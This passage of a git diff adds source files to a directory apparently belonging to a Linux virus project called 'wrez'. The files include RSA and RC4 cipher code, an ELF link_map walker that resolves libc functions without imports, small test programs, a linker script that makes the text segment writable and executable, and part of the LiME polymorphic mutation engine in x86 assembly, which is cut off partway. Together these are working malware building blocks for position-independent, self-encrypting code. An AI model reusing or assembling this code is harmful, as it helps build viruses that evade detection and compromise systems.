+                                if(sb(c, m)) ad(c, m);
+                        }
+                }
+                e--;
+                j = UNIT_BITS;
+        }
+        cl(ee);
+        *ee = 1;
+        return (!cu(c,ee));
+}
+
+#ifndef THINK_SILENTLY
+
+/*
+ * tw() -- indicate working when checking/generating primes
+ */
+
+#include <stdio.h>              /* only for tw() */
+
+static void
+tw(void)
+{
+        static ULONG j = 0;
+        putchar("/-\\|"[j & 3]);
+        j++;
+        putchar('\b');
+        fflush(stdout);
+}
+
+#endif /* THINK_SILENTLY */
+
+/*
+ * next_prime(N a) -- find next probable prime >= a
+ */
+
+void
+next_prime(N a)
+{
+        NN b;
+        *a |= 1;
+        cl(b); *b = 2;
+        for (;;) {
+#ifndef THINK_SILENTLY
+                tw();
+#endif /* THINK_SILENTLY */
+                if (!sieve_prime(a)) {
+                        if (prob_prime(a))
+                                return;
+                }
+                ad(a, b);
+        }
+}
+
+/*
+ * bits rsa_gen(rsa_key *key) -- generate a RSA key from key->p and key->q
+ * Initialize key->p and key->q either with primes or strong random
+ * integers of apporopriate size. Returns number of bits in modulus key->pq
+ * or 0 if key generation failed.
+ */
+
+ULONG
+rsa_gen(rsa_key *k)
+{
+        NN p1, q1, pq1, f, g, t;
+        next_prime(k->p);
+        next_prime(k->q);
+        if (cu(k->p, k->q) < 0) {
+                cp(t, k->p);
+                cp(k->p, k->q);
+                cp(k->q, t);
+        }
+        hn(t, "1");
+        cp(p1, k->p);
+        sb(p1, t);
+        cp(q1, k->q);
+        sb(q1, t);
+        cp(g, p1);
+        gd(g, q1);
+        hn(t, "ff");
+        if (cu(t, g) < 0)
+                return 0;
+        cp(k->pq, k->p);
+        mu(k->pq, k->q);
+        cp(pq1, p1);
+        mu(pq1, q1);
+        cp(f, pq1);
+        dm(f, g, t);
+        hn(k->e, "3");
+        hn(k->qp, "1");
+        cp(t, pq1);
+        gd(t, k->e);
+        if (cu(t, k->qp)) {
+                hn(k->e, "10001");
+                cp(t, pq1);
+                gd(t, k->e);
+                if (cu(t, k->qp))
+                        return 0;
+        }
+        cp(k->d, k->e);
+        iv(k->d, f);
+        cp(t, k->d);
+        dm(t, p1, k->dp);
+        cp(t, k->d);
+        dm(t, q1, k->dq);
+        cp(k->qp, k->q);
+        iv(k->qp, k->p);
+        cp(t, k->pq);
+        for(k->b = 0; ts(t); sr(t), k->b++)
+                ; /* VOID */
+        return (k->b);
+}
+
+/*
+ * rsa_dec(N m, rsa_key *key) -- low level rsa decryption. Result undefined
+ * (ie. wrong) if key is not private rsa key.
+ */
+
+void
+rsa_dec(N m, rsa_key * k)
+{
+        NN mp, mq, t;
+        cp(t, m);
+        dm(t, k->p, mp);
+        cp(t, m);
+        dm(t, k->q,
+           mq);
+        em(mp, k->dp, k->p);
+        em(mq, k->dq, k->q);
+        if (sb(mp, mq))
+                ad(mp, k->p);
+        mm(mp, k->qp,
+           k->p);
+        mu(mp, k->q);
+        ad(mp, mq);
+        cp(m, mp);
+}
+
+/*
+ * rsa_enc(N m, rsa_key *k) -- low level rsa encryption
+ */
+
+void
+rsa_enc(N m, rsa_key * k)
+{
+        em(m, k->e, k->pq);
+}
+
+/*
+ * len = n_to_b(unsigned char *buf, N a) -- convert a to bytes, most
+ * significant byte first. Returns number of bytes written to buf. buf
+ * should be large enough to hold sizeof(NN) bytes. (Note that number
+ * is handled as unsigned, negative value converts to sizeof(NN) bytes.)
+ * (XXX check portablility when converting to not-16/32 bit machine)
+ */
+
+ULONG
+n_to_b(unsigned char *b, N a)
+{
+        ULONG i = RSA_SIZE - 1, l = 1;
+        a += RSA_SIZE;
+        while (!*--a && i)
+                i--;
+        if (*a > 255) {
+                *b++ = *a >> 8;
+                l++;
+        }
+        *b++ = *a;
+        while (i--) {
+                *b++ = *--a >> 8;
+                *b++ = *a;
+                l += 2;
+        } 
+        return (l);
+}
+
+/*
+ * b_to_n(N a, unsigned char *buf,ULONG len) -- convert len bytes from
+ * buf to value a. Conversion is unsigned, most significant byte first.
+ * (XXX check portablility when converting to not-16/32 bit machine)
+ */
+
+void
+b_to_n(N a, unsigned char *b, ULONG l)
+{
+        ULONG i;
+        if (l > RSA_SIZE * sizeof(UWORD))
+                l = RSA_SIZE * sizeof(UWORD);
+        b += l;
+        cl(a);
+        i = l / 2;
+        while (i--) {
+                *a = *--b;
+                *a++ |= (ULONG) *--b << 8;
+        }
+        if (l & 1)
+                *a = *--b;
+}
+
diff --git a/other/wrez/isolation/cipher-mrsa.h b/other/wrez/isolation/cipher-mrsa.h
new file mode 100644
index 0000000..85631a8
--- /dev/null
+++ b/other/wrez/isolation/cipher-mrsa.h
@@ -0,0 +1,79 @@
+/*
+ * mrsa.h -- Multiprecision math and  RSA public key crypt library
+ * 1993 Risto Paasivirta, paasivir@jyu.fi
+ * Public Domain, no warranty. Use as you wish.
+ */
+
+#ifndef CIPHER_MRSA_H
+#define CIPHER_MRSA_H
+
+#ifndef RSA_SIZE
+/* #define RSA_SIZE 32 for max 512 (actually 511) bit modulus */
+#define RSA_SIZE 16
+#endif
+
+/*
+ * unsigned 16 and 32 -bit types (other sizes may need some porting)
+ */
+
+#ifndef UWORD   
+typedef unsigned short UWORD;
+#endif
+#ifndef ULONG
+typedef unsigned long ULONG;
+#endif
+
+typedef UWORD *N, NN[RSA_SIZE];
+
+typedef struct rsa_key {
+        ULONG b;
+        NN pq,e,d,p,q,dp,dq,qp;
+} rsa_key;
+
+#if !defined(RSA_ONLY) || defined(MRSA_C)
+
+#define UNIT_BITS 16            /* unit bits */
+#define SIGN_BIT (1<<15)        /* top bit of unit */
+#define PRIMES 54               /* number of primes in prime table */
+
+#ifdef  RSA_ONLY        /* define RSA_ONLY if math stuff not needed */
+#define PRIVATE static
+#else
+#define PRIVATE
+#endif
+
+
+int     ts(N a);                /* test signed, returns -1, 0 or 1 */
+ULONG   ng(N a);                /* negate, return carry*/
+void    cl(N a);                /* clear */
+void    cp(N a,N b);            /* copy, a = b */
+int     cu(N a,N b);            /* compare unsigned, returns, -1 0 or 1 */
+ULONG   ad(N a,N b);            /* add, a += b */
+ULONG   sb(N a,N b);            /* substract, a -= b */
+ULONG   sr(N a);                /* shift right, a >>= 1, return carry */
+ULONG   sl(N a);                /* shift left, a <<= 1, return carry */
+void    dm(N a,N b,N c);        /* div-mod unsigned, a /= b, c = a % b */
+void    mu(N a,N b);            /* multiply unsigned, a *= b */
+void    mm(N a,N b,N m);        /* modular multiply, a = a * b mod m */
+void    em(N a,N e,N m);        /* modular exponentiation, a = a^e mod m */
+void    gd(N a,N b);            /* greatst common divisor, a = gcd(a,b) */
+void    iv(N a,N b);            /* multiplicative inverse, a = a^{-1} mod p */
+void    nh(char *a,N b);        /* convert number to hex string */
+void    hn(N a,char *b);        /* convert lowercase hex string to number */
+ULONG   ri();                   /* weak pseudorandom integer */
+
+#endif /* RSA_C */
+
+void    randomize(N a, ULONG bits);
+ULONG   sieve_prime(N);
+int     prob_prime(N);
+void    next_prime(N);
+ULONG   rsa_gen(rsa_key *);
+void    rsa_enc(N,rsa_key *);
+void    rsa_dec(N,rsa_key *);
+ULONG   n_to_b(unsigned char *,N);
+void    b_to_n(N,unsigned char *,ULONG);
+
+#endif
+
+
diff --git a/other/wrez/isolation/cipher-rc4.c b/other/wrez/isolation/cipher-rc4.c
new file mode 100644
index 0000000..1196cb7
--- /dev/null
+++ b/other/wrez/isolation/cipher-rc4.c
@@ -0,0 +1,81 @@
+/* rc4 */
+
+#include "cipher-rc4.h"
+
+
+static void swap_byte (unsigned char *a, unsigned char *b);
+
+void
+rc4_prepare_key (unsigned char *key_data_ptr, int key_data_len, rc4_key *key)
+{
+        unsigned char   i1, i2;
+        unsigned char * s;
+        short           c;
+
+        s = &key->state[0];
+        for (c = 0; c < 256; c++)
+                s[c] = c;
+
+        key->x = key->y = 0;
+        i1 = i2 = 0;
+
+        for (c = 0; c < 256; c++) {
+                i2 = (key_data_ptr[i1] + s[c] + i2) % 256;
+                swap_byte (&s[c], &s[i2]);
+                i1 = (i1 + 1) % key_data_len;
+        }
+}
+
+
+void
+rc4_encipher (unsigned char *buffer, unsigned long int buffer_len,
+        unsigned char *key, int key_len)
+{
+        rc4_key         key_r;
+
+        if (key == NULL || buffer == NULL || buffer_len == 0)
+                return;
+
+        rc4_prepare_key (key, key_len, &key_r);
+        rc4_cipher (buffer, buffer_len, &key_r);
+
+        return;
+}
+
+
+void
+rc4_cipher (unsigned char *buffer_ptr, int buffer_len, rc4_key *key)
+{ 
+        unsigned char   x;
+        unsigned char   y;
+        unsigned char   *state;
+        unsigned char   xi;
+        unsigned int    counter;
+   
+        x = key->x;
+        y = key->y;
+   
+        state = &key->state[0];
+        for(counter = 0; counter < buffer_len; counter ++) {
+                x = (x + 1) % 256;
+                y = (state[x] + y) % 256;
+                swap_byte(&state[x], &state[y]);
+                xi = (state[x] + state[y]) % 256;
+                buffer_ptr[counter] ^= state[xi];
+        }
+
+        key->x = x;
+        key->y = y;
+}
+
+
+static void
+swap_byte (unsigned char *a, unsigned char *b)
+{
+        unsigned char   sb; 
+
+        sb = *a;
+        *a = *b;
+        *b = sb;
+}
+
diff --git a/other/wrez/isolation/cipher-rc4.h b/other/wrez/isolation/cipher-rc4.h
new file mode 100644
index 0000000..f815d7f
--- /dev/null
+++ b/other/wrez/isolation/cipher-rc4.h
@@ -0,0 +1,21 @@
+
+#ifndef CIPHER_RC4_H
+#define CIPHER_RC4_H
+
+
+typedef struct  rc4_key {
+        unsigned char   state[256];
+        unsigned char   x;
+        unsigned char   y;
+} rc4_key;
+
+
+void    rc4_prepare_key (unsigned char *key_data_ptr, int key_data_len, rc4_key *key);
+void    rc4_encipher (unsigned char *buffer,
+        unsigned long int buffer_len, unsigned char *key, int key_len);
+#define rc4_decipher rc4_encipher
+void    rc4_cipher (unsigned char *buffer_ptr, int buffer_len, rc4_key *key);
+
+
+#endif
+
diff --git a/other/wrez/isolation/gmon.out b/other/wrez/isolation/gmon.out
new file mode 100644
index 0000000..49edff1
--- /dev/null
+++ b/other/wrez/isolation/gmon.out
diff --git a/other/wrez/isolation/resolv-grugq-link-technique.c b/other/wrez/isolation/resolv-grugq-link-technique.c
new file mode 100644
index 0000000..a7cfb1a
--- /dev/null
+++ b/other/wrez/isolation/resolv-grugq-link-technique.c
@@ -0,0 +1,209 @@
+#include <elf.h>
+
+#define NULL    ((void *)0)
+
+
+struct link_map {
+        Elf32_Addr        l_addr;
+        char            * l_name;
+        Elf32_Dyn       * l_ld;         /* .dynamic ptr */
+        struct link_map * l_next,
+                        * l_prev;
+};
+
+struct resolv {
+        Elf32_Word      * hash;
+        Elf32_Word      * chain;
+        Elf32_Sym       * symtab;
+        char            * strtab;
+        int               num;
+};
+
+
+static int
+strmatch(char *s1, char *s2)
+{
+        while (*s1++ == *s2++)
+                if (*s1 == 0)
+                        return (1);
+        return (0);
+}
+
+/*
+inline int
+strlen(char *str)
+{
+        al = 0
+        ecx = ffffffff
+        repne scasb
+        not ecx
+}
+*/
+
+static inline struct resolv *
+build_resolv(struct link_map *l, struct resolv *r)
+{
+        Elf32_Dyn       * d;
+
+
+        for (d = l->l_ld; d->d_tag != DT_NULL; d++) {
+                switch (d->d_tag) {
+                case DT_HASH:
+                        {
+                                Elf32_Word      * h;
+
+
+                                h = (Elf32_Word *)
+                                        ((char *)d->d_un.d_ptr+l->l_addr);
+
+                                r->num = *h++; // num buckets
+                                          h++; // num chains
+                                r->hash = h;
+                                r->chain = h + r->num;
+                        }
+                        break;
+                case DT_STRTAB:
+                        r->strtab = (char *)d->d_un.d_ptr;
+                        break;
+                case DT_SYMTAB:
+                        r->symtab = (Elf32_Sym *)d->d_un.d_ptr;
+                        break;
+                default:
+                        break;
+                }
+        }
+        return (r);
+}
+
+static void *
+resolve(char *sym_name, long hn, struct link_map *l)
+{
+        Elf32_Sym       * sym;
+        struct  resolv  * r;
+        long              ndx;
+
+
+        r = build_resolv(l, alloca(sizeof(*r)));
+
+        for (ndx = r->hash[ hn % r->num ]; ndx; ndx = r->chain[ ndx ]) {
+                sym = &r->symtab[ ndx ];
+
+                if (ELF32_ST_TYPE(sym->st_info) != STT_FUNC)
+                        continue;
+
+                if (strmatch(sym_name, r->strtab + sym->st_name))
+                        return (((char *)l->l_addr) + sym->st_value);
+        }
+
+        return NULL;
+}
+
+static struct link_map *
+locate_link_map(void *my_base)
+{
+        Elf32_Ehdr      * e = (Elf32_Ehdr *)my_base;
+        Elf32_Phdr      * p;
+        Elf32_Dyn       * d;
+        Elf32_Word      * got;
+
+
+        p = (Elf32_Phdr *)((char *)e + e->e_phoff);
+
+        while (p++<(Elf32_Phdr *)((char*)p + (e->e_phnum * sizeof(Elf32_Phdr))))
+                if (p->p_type == PT_DYNAMIC)
+                        break;
+
+        // error check
+        /*
+        if (p->p_type != PT_DYNAMIC)
+                return (NULL);
+        */
+
+        for (d = (Elf32_Dyn *)p->p_vaddr; d->d_tag != DT_NULL; d++)
+                if (d->d_tag == DT_PLTGOT) {
+                        got = (Elf32_Word *)d->d_un.d_ptr;
+                        break;
+                }
+        // error check
+        // if (got == NULL)
+        //      return (NULL);
+
+        // different on other platforms
+#define GOT_LM_PTR      1
+        return ((struct link_map *)got[GOT_LM_PTR]);
+}
+
+void *
+get_addr(void *my_base, char *sym_name, long hn)
+{
+        struct link_map * l;
+        void            * a;
+
+
+        l = locate_link_map(my_base);
+        // scan link maps... 
+
+        //  don't know where it terminates... NULL, I hope. :-)
+        while (l->l_prev)
+                l = l->l_prev;
+        
+        // scan link maps for the symbol. slow, but...
+        for (; l->l_next; l = l->l_next)
+                if ((a = resolve(sym_name, hn, l)))
+                        return (a);
+
+        return (NULL);
+}
+
+unsigned long
+elf_hash(const char *name)
+{
+        unsigned long   h = 0, g;
+
+        while (*name) {
+                h = (h << 4) + *name++;
+
+                if ((g = h & 0xf0000000))
+                        h ^= g >> 24;
+                h &= ~g;
+        }
+        return (h);
+}
+
+/*
+void *
+locate_my_base()
+{
+        find an address within the .text section, or at least within the 
+        .data. Then search backwards page at a time:
+
+        for (addr = ALIGN(cur_addr, 4096); ; addr -= 4096)
+                if (memcmp(addr, ELFMAG, SELFMAG))
+                        return (addr);
+        
+        return (NULL);
+
+        That failing, you can hard code it (but doing it dynamicly
+        means you more cool. :)  
+
+}
+*/
+
+#if 1
+int
+main (void)
+{
+        unsigned long     hn;
+        void    * my_addr = (void *) 0x08048000;
+        char    * sym_name = "printf";
+        int     (*printf)(const char *, ...);
+
+
+        hn = elf_hash(sym_name);
+        printf = get_addr(my_addr, sym_name, hn);
+
+        (*printf)("Hello World\n");
+
+        return (0);
+}
+#endif
diff --git a/other/wrez/isolation/rsatest.c b/other/wrez/isolation/rsatest.c
new file mode 100644
index 0000000..96c4db5
--- /dev/null
+++ b/other/wrez/isolation/rsatest.c
@@ -0,0 +1,101 @@
+/*
+ * rsatest.c
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include "cipher-mrsa.h"
+
+void
+main(int i, char **v) {
+        NN m,c,d;
+        rsa_key key;
+        rsa_key key_pub;
+        rsa_key key_priv;
+        char s[RSA_SIZE*4+2];
+
+        if(i==4) {
+                hn(c,v[1]);
+                hn(d,v[2]);
+                hn(m,v[3]);
+                em(c,d,m);
+                nh(s,c); puts(s);
+                exit(EXIT_SUCCESS);
+        }
+
+        if(i!=3) {
+                puts("Usage: mtest [hex_pseed] [hex_qseed]");
+                exit(EXIT_FAILURE);
+        }
+
+        hn(key.p,v[1]);
+        hn(key.q,v[2]);
+
+        puts("Generating key...");
+        if(!rsa_gen(&key)) {
+                puts("Failed, try other seed values.");
+                exit(EXIT_FAILURE);
+        }
+        puts("Done, key components: pq,e,d,p,q,dp,dq,qp");              
+        puts("   public components: pq,e");
+        puts("  private components:      d,p,q,dp,dq,qp");
+        printf("bits = %u\n",key.b);
+
+        nh(s,key.pq); puts(s);
+        nh(s,key.e); puts(s);
+        nh(s,key.d); puts(s); 
+        nh(s,key.p); puts(s);
+        nh(s,key.q); puts(s);
+        nh(s,key.dp); puts(s);
+        nh(s,key.dq); puts(s);
+        nh(s,key.qp); puts(s);
+        puts("testing, msg,cip,dec1,dec2");
+        cl(m);
+        randomize(m, key.b-2);
+        nh(s,m); puts(s);
+
+        memset (&key_pub, 0x00, sizeof (key_pub));
+        cp (key_pub.pq, key.pq);
+        cp (key_pub.e, key.e);
+#if 0
+        memcpy (&key_pub, &key, sizeof (key_pub));
+#if 0
+        cl(key_pub.pq);
+        cl(key_pub.e);
+#endif
+        cl(key_pub.p);
+        cl(key_pub.q);
+        cl(key_pub.d);
+        cl(key_pub.dp);
+        cl(key_pub.dq);
+        cl(key_pub.qp);
+#endif
+        cp(c,m); rsa_enc(c,&key_pub);
+
+        nh(s,c); puts(s);
+#if 0
+        cp(d,c); em(d,key.d,key.pq); /* slow way */
+        nh(s,d); puts(s);
+#endif
+#if 0
+        cl(key.p);
+        cl(key.q);
+        cl(key.dp);
+        cl(key.dq);
+        cl(key.qp);
+
+        cl(key.pq);
+        cl(key.e);
+#endif
+        memset (&key_priv, 0x00, sizeof (key_priv));
+        cp (key_priv.p, key.p);
+        cp (key_priv.q, key.q);
+        cp (key_priv.dp, key.dp);
+        cp (key_priv.dq, key.dq);
+        cp (key_priv.qp, key.qp);
+
+        cp(d,c); rsa_dec(d,&key_priv); /* faster way */
+        nh(s,d); puts(s);
+        exit(EXIT_SUCCESS);
+}
+
diff --git a/other/wrez/lime-interface-test.c b/other/wrez/lime-interface-test.c
new file mode 100644
index 0000000..e9ad669
--- /dev/null
+++ b/other/wrez/lime-interface-test.c
@@ -0,0 +1,69 @@
+/* small test program for the lime c interface
+ */
+
+#include "int80.h"
+#include "lime-interface.h"
+
+
+static unsigned long helloworld (void);
+
+
+int
+main (int argc, char *argv[])
+{
+        void                    (* code_f)(void);
+        unsigned int            code_len;
+        unsigned char           code[4096 + 128];
+        unsigned long           addr;
+        int                     n;
+
+
+        for (n = 0 ; n < sizeof (code) ; ++n)
+                code[n] = 0x00;
+
+        write (2, "plain: ", 6);
+        addr = helloworld ();
+
+        code_len = lime_generate ((void *) addr,
+                50,
+                &code[0], (unsigned long int) &code[0]);
+
+        write (2, "limed\n", 6);
+        code_f = (void (*)(void)) &code[0];
+        code_f ();
+
+        return (0);
+}
+
+
+static unsigned long
+helloworld (void)
+{
+        unsigned long   address;
+
+        __asm__ __volatile__ ("
+                .global tlab0
+                .global tlab3
+                call    tlab4
+        tlab4:  popl    %%eax
+                addl    $(tlab0 - tlab4), %%eax
+                jmp     tlab3
+
+        tlab0:  pushf
+                pusha
+                movl    $0x4, %%eax
+                movl    $0x2, %%ebx
+                movl    $12, %%edx
+                call    tlab1
+                .asciz  \"hello world\\n\"
+        tlab1:  popl    %%ecx
+                int     $0x80
+        tlab2:  popa
+                popf
+                ret
+        tlab3:  nop"
+                : "=a" (address) : : "%ebx", "%ecx", "%edx");
+
+        return (address);
+}
+
diff --git a/other/wrez/lime-interface-test.lds b/other/wrez/lime-interface-test.lds
new file mode 100644
index 0000000..135a8d8
--- /dev/null
+++ b/other/wrez/lime-interface-test.lds
@@ -0,0 +1,32 @@
+
+OUTPUT_FORMAT("elf32-i386", "elf32-i386", "elf32-i386")
+OUTPUT_ARCH(i386)
+
+ENTRY(main)
+
+PHDRS
+{
+        text PT_LOAD FILEHDR PHDRS FLAGS (0x0007);      /* PF_R | PF_W | PF_X */
+        data PT_LOAD FLAGS (0x0006);                    /* PF_R | PF_W */
+}
+
+SECTIONS
+{
+        . = 0x06660000 ;
+        .text : {
+                lime-interface-test.o(.text)
+                lime-interface.o(.text)
+                lime.o(.text)
+                *(.text)
+                *(.rodata)
+                *(.data)
+        } : text
+
+        /* save calls to objcopy, huh */
+        /DISCARD/ : {
+                *(.bss)
+                *(.eh_frame)
+                *(.comment)
+                *(.note)
+        }
+}
diff --git a/other/wrez/lime-interface.c b/other/wrez/lime-interface.c
new file mode 100644
index 0000000..c40b416
--- /dev/null
+++ b/other/wrez/lime-interface.c
@@ -0,0 +1,43 @@
+/* interface code for the LiME polymorphism engine
+ */
+
+#include "lime-interface.h"
+
+
+/* lime_generate
+ *
+ * generate a new polymorph code from source data at 'source', with a length
+ * of 'source_len' bytes. the decrypter and encrypted data will be put at
+ * 'dest', without any length check (expect no more than 4096 bytes for the
+ * decrypter, so 4096 + source_len will do). 'delta' is the virtual address
+ * the decryptor will be placed, its the virutal address of dest[0].
+ * `rnd' is a random seed.
+ *
+ * return the number of bytes put at 'dest'
+ */
+
+inline unsigned int
+lime_generate (unsigned char *source, unsigned int source_len,
+        unsigned char *dest, unsigned long int delta, unsigned int rnd)
+{
+        unsigned int    rlen;
+
+        /* FIXME: eax is not random parameter anymore, but does not hurt */
+        __asm__ __volatile__ ("
+                pushl %%ebp
+                movl 0x14(%%ebp), %%ebp
+                pushf
+                pusha
+                call lime
+                movl %%edx, 0x14(%%esp)
+                popa
+                popf
+                popl %%ebp\n\t"
+                : "=d" (rlen)
+                : "a" (rnd), "b" ((unsigned int) dest),
+                        "c" ((unsigned int) source), "d" (source_len));
+
+        return (rlen);
+}
+
+
diff --git a/other/wrez/lime-interface.h b/other/wrez/lime-interface.h
new file mode 100644
index 0000000..e6f9874
--- /dev/null
+++ b/other/wrez/lime-interface.h
@@ -0,0 +1,11 @@
+
+#ifndef LIME_INTERFACE_H
+#define LIME_INTERFACE_H
+
+inline unsigned int
+lime_generate (unsigned char *source, unsigned int source_len,
+        unsigned char *dest, unsigned long int delta, unsigned int rnd);
+
+#endif
+
+
diff --git a/other/wrez/lime-interface.o b/other/wrez/lime-interface.o
new file mode 100644
index 0000000..e446ba0
--- /dev/null
+++ b/other/wrez/lime-interface.o
diff --git a/other/wrez/lime.asm b/other/wrez/lime.asm
new file mode 100644
index 0000000..a36f3a5
--- /dev/null
+++ b/other/wrez/lime.asm
@@ -0,0 +1,1338 @@
+

+; ***************************************************************

+;  To compile [LiME] under Linux with NASM... Follow as:

+;  nasm -f elf lime-gen.s

+;  ld -e main lime-gen.o -o lime-gen

+; ***************************************************************

+

+global lime

+

+; ***************************************************************

+;  Linux Mutation Engine (source code)

+;  [LiME] Version: 0.2.0                 Last update: 2001/02/28

+;  Written by zhugejin at Taipei, Taiwan.       Date: 2000/10/10

+;  E-mail: zhugejin.bbs@bbs.csie.nctu.edu.tw

+;  WWW: http://cvex.fsn.net

+; ***************************************************************

+

+; Input:

+;       EBX = pointer to memory buffer where LiME will store decryptor

+;             and encrypted data

+;       ECX = pointer to the data, u want to encrypt

+;       EDX = size of data, u want to encrypt

+;       EBP = delta offset

+;

+; Output:

+;       ECX = address of decryptor+encrypted data

+;       EDX = size of decryptor+encrypted data

+

+LIME_BEGIN:

+        dd LIME_SIZE            ; size of [LiME]

+

+lime_pre_opcod_tab db 10000000b ; add

+                   db 10101000b ; sub

+                   db 10110000b ; xor

+                   db 10000000b ; add

+                   

+lime_enc_opcod_tab db  80h,10000000b, 2ah,11000001b     ; add/sub

+                   db  80h,10101000b, 02h,11000001b     ; sub/add

+                   db  80h,10110000b, 32h,11000001b     ; xor/xor

+                   db  82h,10000000b, 2ah,11000001b     ; add/sub

+                   db  82h,10101000b, 02h,11000001b     ; sub/add

+                   db  82h,10110000b, 32h,11000001b     ; xor/xor

+                   db 0c0h,10000000b,0d2h,11001000b     ; rol/ror

+                   db 0c0h,10001000b,0d2h,11000000b     ; ror/rol

+                   

+                   db 0d0h,10000000b,0d0h,11001000b     ; rol/ror

+                   db 0d0h,10001000b,0d0h,11000000b     ; ror/rol

+                   db 0f6h,10010000b,0f6h,11010000b     ; not/not

+                   db 0f6h,10011000b,0f6h,11011000b     ; neg/neg

+                   db 0feh,10000000b,0feh,11001000b     ; inc/dec

+                   db 0feh,10001000b,0feh,11000000b     ; dec/inc

+                   

+                   db  00h,10000000b, 2ah,11000001b     ; add/sub

+                   db  28h,10000000b, 02h,11000001b     ; sub/add

+                   db  30h,10000000b, 32h,11000001b     ; xor/xor

+                    ;--------------------------------------------       

+                   db  10h,10000000b, 1ah,11000001b     ; adc/sbb

+                   db  18h,10000000b, 12h,11000001b     ; sbb/adc

+                   

+                   db  80h,10010000b, 1ah,11000001b     ; adc/sbb

+                   db  80h,10011000b, 12h,11000001b     ; sbb/adc

+                   db  82h,10010000b, 1ah,11000001b     ; adc/sbb

+                   db  82h,10011000b, 12h,11000001b     ; sbb/adc

+

+lime_zero_reg_opcod_tab db 29h,00011000b        ; sub reg,reg

+                        db 2bh,00011000b        ; sub reg,reg

+                        db 31h,00011000b        ; xor reg,reg

+                        db 33h,00011000b        ; xor reg,reg

+lime_init_reg_opcod_tab db 81h,11000000b        ; add reg,xxxxxxxx

+                        db 81h,11001000b        ; or reg,xxxxxxxx

+                        db 81h,11110000b        ; xor reg,xxxxxxxx

+                        db 81h,11000000b        ; add reg,xxxxxxxx

+

+;-----------------------------------------------

+;LIME_make_tsh_cod      dd lime_make_tsh_cod

+;LIME_make_noflags_cod  dd lime_make_noflags_cod

+;LIME_set_disp_reg      dd lime_set_disp_reg

+;LIME_save_edi          dd lime_save_edi

+@       equ $

+;LIME_rnd               dd lime_rnd

+;LIME_rnd_reg           dd lime_rnd_reg

+;LIME_rnd_al            dd lime_rnd_al

+;LIME_rnd_eax_and_al    dd lime_rnd_eax_and_al

+;LIME_rnd_esi           dd lime_rnd_esi

+;-----------------------------------------------

+

+lime_add4_reg_opcod_tab db 11000000b,11000000b,04h,-4h  ; add/add

+                        db 11000000b,11101000b,-4h,04h  ; add/sub

+                        db 11101000b,11101000b,-4h,04h  ; sub/sub

+                        db 11101000b,11000000b,04h,-4h  ; sub/add

+

+lime_mk_mov_cod_addr dw lime_mmc1-@,lime_mmc2-@,lime_mmc3-@

+lime_mk_inc_cod_addr dw lime_mic1-@,lime_mic2-@,lime_mic3-@

+lime_mk_jxx_cod_addr dw lime_mjc1-@,lime_mjc2-@

+

+lime_mk_tsh_cod_addr dw lime_mtc1-@,lime_mtc2-@,lime_mtc3-@,lime_mtc4-@

+                     dw lime_mtc5-@,lime_mtc6-@,lime_mtc7-@,lime_mtc8-@

+                     dw lime_mtc9-@

+;                    dw lime_simd-@

+;                    dw lime_3dnow-@

+

+jxx_addr dd 0

+ret_addr dd 0

+pre_addr dd 0

+pre_count db 0

+

+lime_rnd_val dd 0

+

+orig_reg db 0

+disp_reg db 0

+temp_reg db 0

+key_reg  db 0

+

+        ;   +------------> make no-flags code

+        ;   |+-----------> *reserved* for SIMD Instruction

+        ;   ||+----------> *reserved* for 3DNow! Instruction

+        ;   |||   +------> xchg disp_reg with orig_reg

+        ;   |||   |

+para_eax db 00000000b   ; parameters of LiME

+para_ebx dd 0           ; address of buffer for new decryptor

+para_ecx dd 0           ; begin of code to be decrypted

+para_edx dd 0           ; size of code to be decrypted

+para_ebp dd 0           ; displacement of decryptor

+para_esp dd 0

+

+        ;   +--------------------> byte / dword

+        ;   |+-------------------> mod := (disp32/disp8)

+        ;   ||+------------------> *not used*

+        ;   |||+-----------------> *not used*

+        ;   ||||+----------------> inc reg / dec reg

+        ;   |||||++--------------> *not used*

+        ;   |||||||+-------------> clc / stc

+enc_type dd 00000000b

+

+adr_ndx dd 0

+adr_0   dd 0,0,0,0,0,0,0,0

+adr_1   dd 0,0,0,0,0,0,0,0

+adr_2   dd 0,0,0,0,0,0,0,0

+adr_3   dd 0,0,0,0,0,0,0,0

+

+lime_mmx_opcod_tab:

+db  60h, 61h, 62h, 63h, 64h, 65h, 66h, 67h, 68h, 69h, 6ah, 6bh, 6eh, 6fh

+db  74h, 75h, 76h, 6eh, 6fh,0d1h,0d2h,0d3h,0d5h,0d8h,0d9h,0dbh,0dch,0ddh

+db 0dfh,0e1h,0e2h,0e5h,0e8h,0e9h,0ebh,0ech,0edh,0efh,0f1h,0f2h,0f3h,0f5h

+db 0f8h,0f9h,0fah,0fch,0fdh,0feh

+

+; ---------------------------------------------------------------

+

+lime:

+        pushf

+        cld

+        

+        mov edi,ebx

+        

+        push ebp

+        call lime_reloc

+lime_reloc:

+        pop ebp

+        sub ebp,lime_reloc-@

+        pop dword [ebp-@+para_ebp]

+        mov [ebp-@+para_ebx],ebx

+        mov [ebp-@+para_ecx],ecx

+        mov [ebp-@+para_edx],edx

+        mov [ebp-@+para_esp],esp

+        

+        call lime_make_prefix_decrypt   ;

+        mov [ebp-@+pre_addr],esp

+

+        mov al,3

+        call lime_rnd_eax_and_al

+        mov [ebp-@+adr_ndx],eax

+        xchg ecx,eax

+        inc ecx

+        lea esi,[ebp-@+adr_0]

+lime_make_next_decrypt:

+        call lime_make_decrypt          ;

+        ror dword [ebp-@+enc_type],8

+        loop lime_make_next_decrypt

+        

+        call lime_encrypt               ;

+        

+        mov ecx,[ebp-@+para_ebx]

+        mov edx,edi

+        sub edx,ecx

+

+        mov esp,[ebp-@+para_esp]       

+        popf

+        ret

+        

+; ---------------------------------------------------------------

+

+lime_make_prefix_decrypt:

+        pop dword [ebp-@+ret_addr]

+        call lime_make_tsh_cod

+

+        mov al,7

+        call lime_rnd_eax_and_al

+        add al,7

+        mov [ebp-@+pre_count],al

+        xchg ecx,eax

+mk_next_prefix_decrypt:

+        call lime_make_tsh_cod

+        call lime_set_disp_reg

+        

+        call lime_make_mov_cod

+        push edi                        ; p0

+        stosd

+        

+        call lime_make_xchg_cod_rnd

+        

+        mov al,02h

+        call lime_rnd_eax_and_al

+        add al,81h              ; (add/sub/xor) dword [reg+(xxxxxx)xx],xxxxxxxx

+        stosb

+        push eax

+        mov al,03h

+        call lime_rnd_al

+        lea ebx,[ebp-@+lime_pre_opcod_tab]

+        xlatb

+        or al,[ebp-@+disp_reg]

+        stosb

+        pop ebx

+        push edi                        ; p1

+        call lime_rnd

+        stosd

+        jp lmpd_a1

